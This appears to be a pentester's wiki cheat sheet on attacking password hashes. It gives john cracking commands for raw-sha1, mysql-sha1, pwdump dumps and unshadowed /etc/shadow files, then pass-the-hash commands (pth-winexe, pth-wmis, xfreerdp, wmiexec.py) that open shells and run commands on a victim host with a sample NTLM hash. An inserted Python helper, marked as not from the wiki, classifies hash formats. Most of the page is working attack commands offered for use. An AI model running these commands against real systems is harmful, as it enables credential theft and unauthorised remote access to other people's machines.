Password hash attack
lethanhtung01011980 edited this page Apr 23, 2020 · 24 revisions
- To crack an obtained password hash, first identify its type.
- In Kali:
hash-identifier
- Then key in the hash when prompted.
Scenario: no root/SYSTEM privilege yet, but a password hash has already been obtained via LFI or RFI.
- The hash type was identified in step 1.
- Sample john commands for various hash types:
http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats
- Backup link: https://github.com/lethanhtung01011980/Notes/wiki/john
john --fork=25 --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha1 10.10.10.11.hash
For mysql-sha1 the hash must keep its leading *, the form in which MySQL stores it:
john --fork=25 --wordlist=/usr/share/wordlists/rockyou.txt --format=mysql-sha1 10.10.10.11.hash
Cracking hash dumps produced by pwdump or fgdump:
- pwdump output from Windows, default john modes:
john 127.0.0.1.pwdump
- Use with wordlist:
john --wordlist=/usr/share/wordlists/rockyou.txt 127.0.0.1.pwdump
- Use with wordlist + mutation:
john --rules --wordlist=/usr/share/wordlists/rockyou.txt 127.0.0.1.pwdump
With the contents of /etc/passwd and /etc/shadow saved as password.txt and shadow.txt:
- Hash type should be MD5 crypt ($1$ prefix in /etc/shadow).
- Merge the two files with unshadow:
unshadow 141-password.txt 141-shadow.txt > 141-unshadow.txt
- Crack with wordlist and rules:
john --rules --wordlist=/usr/share/wordlists/rockyou.txt 141-unshadow.txt
- Same run split across 25 forked processes:
john --rules --fork=25 --wordlist=/usr/share/wordlists/rockyou.txt 141-unshadow.txt
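As an added example (not from this wiki), a small Python script that does for the formats listed on this page what hash-identifier does: it maps a hash string to the matching john --format name (including the leading * that mysql-sha1 expects), splits a pwdump line to show whether an account still stores a legacy LM hash, and reports the crypt type of each /etc/shadow entry. The sample pwdump line and shadow entries are constructed; the NT hash value is the one quoted further down this page.

```python
import re

# The "empty" LM half quoted on the page: its presence means no LM hash is stored.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"

def identify_hash(h: str) -> str:
    """Heuristic mapping from hash syntax to a john --format name (what hash-identifier does)."""
    h = h.strip()
    if h.startswith("$1$"):
        return "md5crypt"        # /etc/shadow entry with the $1$ prefix
    if h.startswith("$6$"):
        return "sha512crypt"     # current /etc/shadow default
    if re.fullmatch(r"\*[0-9A-Fa-f]{40}", h):
        return "mysql-sha1"      # MySQL PASSWORD(): '*' followed by 40 hex chars
    if re.fullmatch(r"[0-9A-Fa-f]{40}", h):
        return "raw-sha1"        # a bare 40-hex MySQL hash needs the '*' put back first
    if re.fullmatch(r"[0-9A-Fa-f]{32}", h):
        return "nt-or-raw-md5"   # 32 hex chars: NT (MD4) and MD5 look identical by syntax
    return "unknown"

def parse_pwdump_line(line: str) -> dict:
    """Split a pwdump/fgdump line 'user:rid:lmhash:nthash:::' and flag legacy LM storage."""
    parts = line.strip().split(":")
    if len(parts) < 4:
        raise ValueError("not a pwdump line: " + line)
    user, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
    return {
        "user": user,
        "rid": rid,
        "nt": nt,
        "lm_stored": lm != EMPTY_LM,  # True: LM hashing still enabled for this account (weak)
    }

def shadow_hash_types(shadow_text: str) -> dict:
    """Map each /etc/shadow account with a real hash to its type; locked accounts are skipped."""
    result = {}
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) < 2 or fields[1] == "" or fields[1][0] in "*!":
            continue
        result[fields[0]] = identify_hash(fields[1])
    return result

# Constructed sample data for a stand-alone run; the NT hash value is the one quoted on the page.
SAMPLE_PWDUMP = "Administrator:500:aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5:::"
SAMPLE_SHADOW = "root:$1$saltsalt$AbCdEfGhIjKlMnOpQrStU.:18000:0:99999:7:::\nnobody:*:18000:0:99999:7:::"

if __name__ == "__main__":
    print(parse_pwdump_line(SAMPLE_PWDUMP), shadow_hash_types(SAMPLE_SHADOW))
```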
NTLM/LM password hashes are not salted and remain static between sessions and computers.
- Copy the local administrator NTLM hash of the compromised machine.
- Use this hash with a patched pth-winexe to gain a shell on a different machine that has the same local administrator / password combination.
- /usr/bin/pth-winexe
pth tools in Kali
- Ref: https://www.hacklikeapornstar.com/all-pth-techniques/
- /usr/bin/pth*
- pth-net: executes net commands (net user, net share) on remote hosts
- pth-rpcclient: opens an interactive session to execute RPC commands
- pth-smbclient: browses available shares on remote computers
- pth-winexe: executes interactively a command on remote computers
- pth-wmic: executes WMI queries on remote computers
- pth-wmis: executes a command using WMI on remote computers
Remote command execution in cmd.exe:
pth-winexe -U WORKGROUP/Administrator%hash:hash //victim-ip cmd.exe
- Example:
pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 cmd.exe
Other examples:
pth-wmic -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 "select Name from Win32_UserAccount"
pth-wmis -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 "cmd.exe /c whoami > c:\temp\result.txt"
pth-smbclient -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25/c$
pth-rpcclient -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25
Remote desktop using the hash, for Windows 2012 R2 and Windows 8.1 victims:
- apt-get update
- apt-get install freerdp-x11
xfreerdp /u:richard /d:workgroup /pth:C0F2E311D3F450A7FF2571BB59FBEDE5 /v:192.168.1.25
Already installed in Kali
- If SMB port 445 is open:
- wmiexec.py -hashes hash1:hash2 administrator@victim-ip
- Works without the LM half as well (leave it empty before the colon):
wmiexec.py -hashes :XXXXX7A37513BXXXX08952XXXX522B administrator@victim-ip